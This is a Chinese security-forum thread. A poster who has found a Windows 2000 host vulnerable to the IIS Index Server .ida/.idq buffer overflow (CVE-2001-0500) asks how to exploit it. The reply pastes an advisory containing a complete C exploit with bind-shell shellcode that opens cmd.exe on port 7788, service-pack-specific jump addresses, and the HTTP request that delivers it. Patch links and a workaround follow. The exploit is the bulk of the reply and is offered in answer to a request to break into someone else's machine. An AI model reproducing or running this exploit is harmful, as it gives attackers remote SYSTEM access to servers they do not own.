|
![]() | 作者: liming [liming]
![]() |
登录 |
存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) 我发现一台win2000的机器存在上述问题,应该怎样利用?请详细指点! |
地主 发表时间: 01/17 10:35 |
![]() | 回复: gls [gls] ![]() |
登录 |
不董 |
B1层 发表时间: 01/17 10:52 |
![]() | 回复: vishx [vishx] ![]() |
登录 |
BUGTRAQ ID 严重程度 CVE ID 发布日期 更新日期 2880 高 CVE-2001-0500 2001-06-20 2001-06-20 错误类型 利用方式 威胁类型 输入验证错误 服务器模式 远程管理员权限 所影响的操作系统和应用程序 Microsoft IIS 4.0 - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 Microsoft IIS 5.0 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server 详细描述 <*IIS 4.0/5.0 Index Server and Indexing Service ISAPI Extension Buffer Overflow *> <keyword: ISAPI Extension Buffer Overflow> 微软的INDEX SERVER可以加快WEB的搜索能力,提供对管理员脚本和internet数 据的查询,默认支持管理脚本.ida和查询脚本.idq,不过都是使用idq.dll来进行解析。 不过其存在一个缓冲溢出,其中问题存在于idq.dll扩展程序上,由于没有对用户提交的输入参数据进行边界检查,可以导致远程攻击者利用溢出获得SYSTEM权利来访问远程系统。 测试代码 如下的请求可以导致EIP地址被覆盖: GET /NULL.ida?[buffer]=X HTTP/1.1 Host: werd [buffer]大约是240 bytes. isno(isno@xfocus.org) 提供了如下测试程序: //虽然已经有人写过这个东西了,不过我想发布exploit程序最重要的应该是提供 //给大家编程思路,而不仅仅是提供一个攻击工具,所以我把源代码也公布出来。 //by isno<isno@xfocus.org> #ifndef WIN32 #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #else #pragma comment (lib,"Ws2_32") #include <windows.h> #include <winsock.h> #define close closesocket #endif #include <stdio.h> #define NOP 0x90 #define SP0_JMPEBX "%uac97%u77e4" //jmp ebx in WIN2k+SP0 #define SP1_JMPEBX "%ubf17%u77e4" //jmp ebx in WIN2k+SP1 unsigned char shellcode[]= //shellcode bind cmd.exe port 7788 "\x90\x55\x8b\xec\x33\xc0\x40\xc1\xe0\x0b\x2b\xe0\xeb\x03\x90\xeb" "\x05\xe8\xf9\xff\xff\xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90" "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa" "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36" "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97" "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14" "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2" "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14" "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5" "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1" "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16" "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68" "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1" "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94" "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4" "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68" "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57" "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4" "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4" "\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5" "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68" "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67" "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1" "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf" "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab" "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0" "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4" "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0" "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56" "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7" "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57" "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4" "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f" "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7" "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68" "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f" "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75" "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0" "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5" "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2" "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6" "\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97" "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc" "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb" "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97" "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2" "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4" "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97" "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2" "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97" "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97" "\x68\x68\x68\x68"; unsigned char jump[]= "%u08eb%u9090"; //jmp 0x08 unsigned char jump_to_shell[]= "%u9090%uc033%ub866%u031f%u0340%u8bd8%u8b03" "%u6840%udb33%u30b3%uc303%ue0ff"; //jmp dword ptr [[[ebx+0x320]+0x68]+0x30] int main(int argc,char *argv[]) { int s,sp; char *p,shell_buf[4096],jmp_buf[4096],buf[4096]; struct hostent *he; struct sockaddr_in sin; #ifdef WIN32 WSADATA WSAData; if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { printf("WSAStartup failed.\n"); WSACleanup(); exit(1); } #endif if(argc!=3) { printf("Usage: %s host sp\n",argv[0]); return -1; } sp=atoi(argv[2]); memset(shell_buf,NOP,sizeof(shell_buf)); memcpy(&shell_buf[16],shellcode,strlen(shellcode)); shell_buf[strlen(shellcode)+16] = 0; memset(jmp_buf,1,sizeof(jmp_buf)); p = &jmp_buf[232]; sprintf(p,"%s",jump); p += strlen(jump); if(sp==1) { sprintf(p,"%s",SP1_JMPEBX); p += strlen(SP1_JMPEBX); } else { sprintf(p,"%s",SP0_JMPEBX); p += strlen(SP0_JMPEBX); } sprintf(p,"%s",jump_to_shell); p += strlen(jump_to_shell); p = 0; sprintf(buf,"GET /null.ida?%s=x HTTP/1.0\r\nShell: %s\r\n\r\n",jmp_buf,shell_buf); if((he = gethostbyname(argv[1])) == 0) { printf("Unable to resolve host %s\n",argv[1]); exit(1); } sin.sin_family = AF_INET; sin.sin_addr = *((struct in_addr *)he->h_addr); sin.sin_port = htons(80); if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Unable to set up socket\n"); exit(1); } if((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1) { printf("Unable to connect\n"); exit(1); } else printf("Connected...\n"); if(send(s, buf, strlen(buf), 0) == -1) { printf("Unable to send\n"); exit(1); } else printf("code sented...\n"); #ifdef WIN32 Sleep(1000); #else sleep(1); #endif close(s); printf("Done.\n"); return 0; } 解决方案 注意: 1、安装了Index Server 或 Index Services,但是没有安装 IIS 的系统无此漏洞 2、即使 Index Server/Indexing Service 没有开启,但是只要对 .idq 或 .ida 文件的脚本映射存在,攻击者也能利用此漏洞。 1,请您下载安装补丁: Windows NT 4.0: MS 下载:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833 Windows 2000 Professional, Server and Advanced Server: MS 下载:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800 Windows XP beta: 在下个 BETA 版本会得到解决。 2,删除对 .idq 和 .ida 的脚本映射。 注意:如果其它系统组件被增删,有可能导致该映射被重新自动安装。 发现者 http://www.eeye.com http://www.microsoft.com/technet/security/bulletin/MS01-033.asp |
B2层 发表时间: 01/17 11:34 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号